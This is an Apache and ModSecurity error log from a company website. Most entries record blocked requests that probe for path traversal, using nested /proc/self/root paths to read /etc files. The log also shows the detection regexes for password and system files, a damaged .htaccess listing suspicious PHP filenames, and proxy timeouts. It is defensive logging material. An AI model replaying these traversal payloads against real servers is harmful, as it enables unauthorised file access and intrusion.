[Thu Mar 19 11:41:38.196171 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.244.43:33220] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwLIgkwaGbbGflqUZDJVgAAAMs"]
[Thu Mar 19 11:41:44.061833 2026] [proxy_fcgi:error] [pid 14269:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57454] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:42:12.078752 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58078] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:42:37.169830 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:58748] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:42:42.616316 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.243.128:50612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwLYhkFeYa1D6dYQnD22QAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:42:59.141826 2026] [proxy_fcgi:error] [pid 27403:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59212] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:43:21.129940 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59790] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:43:25.782627 2026] [core:alert] [pid 27403:tid 140411725141760] [client 57.141.18.123:33600] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 11:43:41.199194 2026] [mime_magic:error] [pid 31803:tid 140411616036608] (70014)End of file found: [client 57.141.18.14:34128] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:43:43.137807 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60350] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:44:02.986758 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:35082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwLsvu8EFLIOrSqIputnAAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:02.987086 2026] [mime_magic:error] [pid 30077:tid 140411632822016] (70014)End of file found: [client 74.7.241.31:35082] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:05.084983 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:53318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwLteoXxyEfFpUF8f8UHwAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:05.137818 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60910] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:44:08.244159 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.241.31:53324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwLuAbLMZ6AikZjR9VjqQAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:11.026743 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.241.31:45106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwLuf-YZRR_7pZ7nDKR-wAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:13.352048 2026] [:error] [pid 19093:tid 140411557287680] [client 74.7.241.31:45108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwLvF_V7PWP6ixUYl7DEAAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:14.678242 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:45116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwLvsdf6f5d65gmYZR-GQAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:18.525227 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:54290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwLwta6ubjKNq_cu4ZbhQAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:27.068956 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33272] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:44:28.487689 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.241.31:54302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwLzF_V7PWP6ixUYl7DGQAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:30.304229 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.241.31:54302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwLzl_V7PWP6ixUYl7DGwAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:32.809166 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:51194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwL0Na6ubjKNq_cu4ZbkQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:35.364749 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:51196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwL09a6ubjKNq_cu4ZblwAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:39.839222 2026] [core:alert] [pid 27293:tid 140411548894976] [client 57.141.18.75:35576] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 11:44:45.104199 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.241.31:50220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwL3QbLMZ6AikZjR9VjvAAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:48.371519 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.241.31:56828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwL4P-YZRR_7pZ7nDKSCgAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:44:51.064421 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33844] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:44:52.962692 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.241.31:56836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwL5BkFeYa1D6dYQnD3IAAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:45:00.167280 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:53602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwL7AkwaGbbGflqUZDJ6gAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:01.729776 2026] [:error] [pid 30077:tid 140411691570944] [client 57.141.18.46:35836] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL7fu8EFLIOrSqIputzQAAAkY"]
[Thu Mar 19 11:45:03.695999 2026] [:error] [pid 30077:tid 140411599251200] [client 57.141.18.12:35778] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL7_u8EFLIOrSqIputzgAAAlE"]
[Thu Mar 19 11:45:04.171537 2026] [:error] [pid 27403:tid 140411590858496] [client 57.141.18.54:36110] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL8BkFeYa1D6dYQnD3JQAAAdI"]
[Thu Mar 19 11:45:04.894637 2026] [:error] [pid 31803:tid 140411557287680] [client 57.141.18.80:35884] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL8OyqAr6etmhZHNpmswAAAFY"]
[Thu Mar 19 11:45:05.340023 2026] [:error] [pid 27293:tid 140411557287680] [client 57.141.18.19:36132] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL8f-YZRR_7pZ7nDKSEAAAA9Y"]
